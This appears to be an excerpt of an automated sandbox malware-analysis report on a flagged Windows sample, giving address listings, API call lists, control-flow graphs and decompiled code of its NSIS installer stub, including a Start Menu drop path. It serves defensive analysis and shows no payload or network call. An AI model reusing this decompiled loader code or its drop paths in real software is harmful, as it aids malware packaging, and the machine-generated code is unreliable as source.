                                                    0x00404084
                                                    0x0040408c
                                                    0x00404092
                                                    0x00404098
                                                    0x0040409c
                                                    0x004040a3
                                                    0x004040a3
                                                    0x004040a3
                                                    0x004040ad
                                                    0x004040bf
                                                    0x004040cb
                                                    0x004040d0
                                                    0x004040da
                                                    0x004040e0
                                                    0x004040e2
                                                    0x004040e7
                                                    0x004040e4
                                                    0x004040e4
                                                    0x004040e4
                                                    0x004040f7
                                                    0x0040410f
                                                    0x00404111
                                                    0x00404117
                                                    0x0040412c
                                                    0x00404119
                                                    0x00404122
                                                    0x00404124
                                                    0x00404124
                                                    0x00404132
                                                    0x00404142
                                                    0x00404158
                                                    0x0040415f
                                                    0x00404165
                                                    0x00404169
                                                    0x0040416e
                                                    0x00404170
                                                    0x00000000
                                                    0x00404176
                                                    0x00404176
                                                    0x00404178
                                                    0x00000000
                                                    0x00000000
                                                    0x0040417e
                                                    0x00404182
                                                    0x004041a7
                                                    0x004041ad
                                                    0x004041b3
                                                    0x004041b5
                                                    0x00000000
                                                    0x00000000
                                                    0x004041db
                                                    0x004041e1
                                                    0x004041e3
                                                    0x004041e8
                                                    0x00000000
                                                    0x00000000
                                                    0x004041ee
                                                    0x004041f1
                                                    0x004041f4
                                                    0x0040420b
                                                    0x00404217
                                                    0x00404230
                                                    0x00404236
                                                    0x0040423a
                                                    0x0040423f
                                                    0x00404245
                                                    0x00000000
                                                    0x00000000
                                                    0x0040424f
                                                    0x0040425a
                                                    0x00000000
                                                    0x0040425a
                                                    0x00404184
                                                    0x0040418a
                                                    0x00000000
                                                    0x00000000
                                                    0x00404190
                                                    0x00404196
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040419c
                                                    0x00404170
                                                    0x00404267
                                                    0x00404273
                                                    0x0040427a
                                                    0x00000000
                                                    0x00403fc6
                                                    0x00403fc6
                                                    0x00403fc9
                                                    0x00403ffc
                                                    0x00403ffc
                                                    0x00403ffe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403ffe
                                                    0x00403fcb
                                                    0x00403fcf
                                                    0x00403fd4
                                                    0x00403fd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00403fe6
                                                    0x00403fee
                                                    0x00000000
                                                    0x00403ff4
                                                    0x00403e22
                                                    0x00403e22
                                                    0x00403e26
                                                    0x00403e2b
                                                    0x00403e3a
                                                    0x00403e3a
                                                    0x00403e43
                                                    0x00403e4c
                                                    0x00403e57
                                                    0x00403e57
                                                    0x00403e63
                                                    0x00403e7f
                                                    0x00403e82
                                                    0x00403e95
                                                    0x00403e9b
                                                    0x00403f3e
                                                    0x00000000
                                                    0x00403f47
                                                    0x00403ea1
                                                    0x00403eae
                                                    0x00403eb0
                                                    0x00403eb2
                                                    0x00403ed1
                                                    0x00403ed1
                                                    0x00403ed4
                                                    0x00403ed9
                                                    0x00403edc
                                                    0x00403eec
                                                    0x00403eed
                                                    0x00403eef
                                                    0x00403f25
                                                    0x00403f38
                                                    0x00000000
                                                    0x00403f38
                                                    0x00403ef1
                                                    0x00403ef7
                                                    0x00403f10
                                                    0x00403f15
                                                    0x00403f17
                                                    0x00000000
                                                    0x00000000
                                                    0x00403f19
                                                    0x00403f05
                                                    0x00403f05
                                                    0x00403f07
                                                    0x00403f07
                                                    0x00000000
                                                    0x00403f07
                                                    0x00403efa
                                                    0x00403eff
                                                    0x00000000
                                                    0x00403eff
                                                    0x00403ede
                                                    0x00403ee4
                                                    0x00000000
                                                    0x00000000
                                                    0x00403ee6
                                                    0x00000000
                                                    0x00403ee6
                                                    0x00403ed6
                                                    0x00000000
                                                    0x00403ed6
                                                    0x00403ebc
                                                    0x00403ec3
                                                    0x00403ec9
                                                    0x00403ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403ecb
                                                    0x00403e87
                                                    0x00000000
                                                    0x00403e65
                                                    0x00403e6b
                                                    0x00403e75
                                                    0x00404280
                                                    0x00404286
                                                    0x00404293
                                                    0x00404299
                                                    0x00404299
                                                    0x004042a3
                                                    0x00000000
                                                    0x004042a3
                                                    0x00403e63

                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                    • ShowWindow.USER32(?), ref: 00403E57
                                                    • DestroyWindow.USER32 ref: 00403E6B
                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                    • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                    • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                    • GetDlgItem.USER32(?,00000001), ref: 00403F71
                                                    • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
                                                    • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                    • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                    • EnableWindow.USER32(?,?), ref: 004040DA
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
                                                    • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                    • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                    • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                    • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                    • String ID: (7B
                                                    • API String ID: 3282139019-3251261122
                                                    • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                    • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                    • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                    • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403A5B Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 358 403a5b-403a73 call 4065ec 361 403a75-403a80 GetUserDefaultUILanguage call 406159 358->361 362 403a87-403abe call 4060df 358->362 366 403a85 361->366 367 403ac0-403ad1 call 4060df 362->367 368 403ad6-403adc lstrcatW 362->368 369 403ae1-403b0a call 403d31 call 405cce 366->369 367->368 368->369 375 403b10-403b15 369->375 376 403b9c-403ba4 call 405cce 369->376 375->376 377 403b1b-403b43 call 4060df 375->377 382 403bb2-403bd7 LoadImageW 376->382 383 403ba6-403bad call 406234 376->383 377->376 387 403b45-403b49 377->387 385 403c58-403c60 call 40140b 382->385 386 403bd9-403c09 RegisterClassW 382->386 383->382 400 403c62-403c65 385->400 401 403c6a-403c75 call 403d31 385->401 388 403d27 386->388 389 403c0f-403c53 SystemParametersInfoW CreateWindowExW 386->389 391 403b5b-403b67 lstrlenW 387->391 392 403b4b-403b58 call 405bf3 387->392 394 403d29-403d30 388->394 389->385 395 403b69-403b77 lstrcmpiW 391->395 396 403b8f-403b97 call 405bc6 call 406212 391->396 392->391 395->396 399 403b79-403b83 GetFileAttributesW 395->399 396->376 403 403b85-403b87 399->403 404 403b89-403b8a call 405c12 399->404 400->394 410 403c7b-403c95 ShowWindow call 40657c 401->410 411 403cfe-403d06 call 405444 401->411 403->396 403->404 404->396 418 403ca1-403cb3 GetClassInfoW 410->418 419 403c97-403c9c call 40657c 410->419 416 403d20-403d22 call 40140b 411->416 417 403d08-403d0e 411->417 416->388 417->400 422 403d14-403d1b call 40140b 417->422 420 403cb5-403cc5 GetClassInfoW RegisterClassW 418->420 421 403ccb-403cee DialogBoxParamW call 40140b 418->421 419->418 420->421 427 403cf3-403cfc call 4039ab 421->427 422->400 427->394
                                                    C-Code - Quality: 96%
                                                    			E00403A5B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a250;
				_t22 = E004065EC(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004060DF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E004060DF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406159(L"1033", _t73 & 0x0000ffff);
				}
				E00403D31(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93";
				 *0x42a2c0 =  *0x42a258 & 0x00000020;
				 *0x42a2dc = 0x10000;
				if(E00405CCE(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") != 0) {
					L16:
					if(E00405CCE(_t98, _t86) == 0) {
						E00406234(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403D31(_t78, __eflags);
							__eflags =  *0x42a2e0;
							if( *0x42a2e0 != 0) {
								_t33 = E00405444(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E0040657C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040657C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403DFE, 0); // executed
							E004039AB(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E004060DF( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405BF3(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406212(_t86, E00405BC6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405C12(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                    0x00403a61
                                                    0x00403a6a
                                                    0x00403a71
                                                    0x00403a73
                                                    0x00403a87
                                                    0x00403a99
                                                    0x00403aa2
                                                    0x00403aab
                                                    0x00403ab2
                                                    0x00403ab7
                                                    0x00403abe
                                                    0x00403ad1
                                                    0x00403ad1
                                                    0x00403adc
                                                    0x00403a75
                                                    0x00403a75
                                                    0x00403a80
                                                    0x00403a80
                                                    0x00403ae1
                                                    0x00403aeb
                                                    0x00403af4
                                                    0x00403af9
                                                    0x00403b0a
                                                    0x00403b9c
                                                    0x00403ba4
                                                    0x00403bad
                                                    0x00403bad
                                                    0x00403bc3
                                                    0x00403bc9
                                                    0x00403bd7
                                                    0x00403c58
                                                    0x00403c60
                                                    0x00403c6a
                                                    0x00403c6f
                                                    0x00403c75
                                                    0x00403cff
                                                    0x00403d04
                                                    0x00403d06
                                                    0x00403d22
                                                    0x00000000
                                                    0x00403d22
                                                    0x00403d08
                                                    0x00403d0e
                                                    0x00403d16
                                                    0x00403d16
                                                    0x00000000
                                                    0x00403d0e
                                                    0x00403c83
                                                    0x00403c8e
                                                    0x00403c93
                                                    0x00403c95
                                                    0x00403c9c
                                                    0x00403c9c
                                                    0x00403ca7
                                                    0x00403caf
                                                    0x00403cb1
                                                    0x00403cb3
                                                    0x00403cbc
                                                    0x00403cbf
                                                    0x00403cc5
                                                    0x00403cc5
                                                    0x00403ce4
                                                    0x00403cf5
                                                    0x00000000
                                                    0x00403cfa
                                                    0x00403c62
                                                    0x00403c64
                                                    0x00000000
                                                    0x00403bd9
                                                    0x00403bd9
                                                    0x00403be5
                                                    0x00403bef
                                                    0x00403bf5
                                                    0x00403bfa
                                                    0x00403c09
                                                    0x00403d27
                                                    0x00403d27
                                                    0x00000000
                                                    0x00403d27
                                                    0x00403c18
                                                    0x00403c53
                                                    0x00000000
                                                    0x00403c53
                                                    0x00403b10
                                                    0x00403b10
                                                    0x00403b15
                                                    0x00000000
                                                    0x00000000
                                                    0x00403b23
                                                    0x00403b35
                                                    0x00403b3a
                                                    0x00403b43
                                                    0x00000000
                                                    0x00000000
                                                    0x00403b49
                                                    0x00403b4b
                                                    0x00403b58
                                                    0x00403b58
                                                    0x00403b61
                                                    0x00403b67
                                                    0x00403b8f
                                                    0x00403b97
                                                    0x00000000
                                                    0x00403b79
                                                    0x00403b7a
                                                    0x00403b83
                                                    0x00403b89
                                                    0x00403b8a
                                                    0x00000000
                                                    0x00403b8a
                                                    0x00403b85
                                                    0x00403b87
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403b87
                                                    0x00403b67

                                                    APIs
                                                      • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                      • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00000000), ref: 00403A75
                                                      • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                    • lstrcatW.KERNEL32(1033,00423728), ref: 00403ADC
                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75F23420), ref: 00403B5C
                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93), ref: 00403BC3
                                                    • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                    • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                    • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                    • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                    • API String ID: 606308-1906243086
                                                    • Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                    • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                    • Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                    • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 875 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 878 402f25-402f2a 875->878 879 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 875->879 880 403174-403178 878->880 887 402f63-402f7a 879->887 888 40304d-40305b call 402e33 879->888 890 402f7c 887->890 891 402f7e-402f8b call 4033ec 887->891 895 403061-403064 888->895 896 40312c-403131 888->896 890->891 897 402f91-402f97 891->897 898 4030e8-4030f0 call 402e33 891->898 899 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 895->899 900 403066-40307e call 403402 call 4033ec 895->900 896->880 901 403017-40301b 897->901 902 402f99-402fb1 call 405da2 897->902 898->896 926 4030f2-403122 call 403402 call 40317b 899->926 927 4030de-4030e3 899->927 900->896 923 403084-40308a 900->923 910 403024-40302a 901->910 911 40301d-403023 call 402e33 901->911 902->910 920 402fb3-402fba 902->920 913 40302c-40303a call 40669d 910->913 914 40303d-403047 910->914 911->910 913->914 914->887 914->888 920->910 925 402fbc-402fc3 920->925 923->896 923->899 925->910 928 402fc5-402fcc 925->928 935 403127-40312a 926->935 927->880 928->910 930 402fce-402fd5 928->930 930->910 932 402fd7-402ff7 930->932 932->896 934 402ffd-403001 932->934 936 403003-403007 934->936 937 403009-403011 934->937 935->896 938 403133-403144 935->938 936->888 936->937 937->910 941 403013-403015 937->941 939 403146 938->939 940 40314c-403151 938->940 939->940 942 403152-403158 940->942 941->910 942->942 943 40315a-403172 call 405da2 942->943 943->880
                                                    C-Code - Quality: 99%
                                                    			E00402ED5(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a24c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", 0x400);
				_t105 = E00405DE7(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406212(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe");
				E00406212(0x439000, E00405C12(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E33(1);
					__eflags =  *0x42a254;
					if( *0x42a254 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E0040670B(0x40ce48);
						E00405E16(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403402( *0x42a254 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E0040317B(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a250 = _t110;
								 *0x42a258 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a25c =  *0x42a25c + 1;
									__eflags =  *0x42a25c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x955a
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405DA2(0x42a260, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403402( *0x418ed0);
					_t77 = E004033EC( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004033EC(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E33(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a254;
						if( *0x42a254 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E33(0);
							}
							goto L19;
						}
						E00405DA2( &_v40, 0x418ee8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x17a74
						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a254 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x1a4bd
						if(__eflags < 0) {
							_v8 = E0040669D(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                                                    0x00402ee3
                                                    0x00402ee6
                                                    0x00402f00
                                                    0x00402f05
                                                    0x00402f18
                                                    0x00402f1d
                                                    0x00402f23
                                                    0x00000000
                                                    0x00402f25
                                                    0x00402f36
                                                    0x00402f47
                                                    0x00402f4e
                                                    0x00402f54
                                                    0x00402f56
                                                    0x00402f5b
                                                    0x00402f5d
                                                    0x0040304d
                                                    0x0040304f
                                                    0x00403054
                                                    0x0040305b
                                                    0x00000000
                                                    0x00000000
                                                    0x00403061
                                                    0x00403064
                                                    0x00403090
                                                    0x00403095
                                                    0x004030a0
                                                    0x004030a2
                                                    0x004030b3
                                                    0x004030ce
                                                    0x004030d4
                                                    0x004030d7
                                                    0x004030dc
                                                    0x004030fb
                                                    0x0040310b
                                                    0x0040311d
                                                    0x00403122
                                                    0x00403127
                                                    0x0040312a
                                                    0x00403133
                                                    0x00403137
                                                    0x0040313f
                                                    0x00403144
                                                    0x00403146
                                                    0x00403146
                                                    0x00403146
                                                    0x0040314e
                                                    0x0040314e
                                                    0x00403151
                                                    0x00403152
                                                    0x00403152
                                                    0x00403155
                                                    0x00403157
                                                    0x00403157
                                                    0x00403157
                                                    0x0040315a
                                                    0x00403161
                                                    0x0040316d
                                                    0x00403172
                                                    0x00000000
                                                    0x00403172
                                                    0x00000000
                                                    0x0040312a
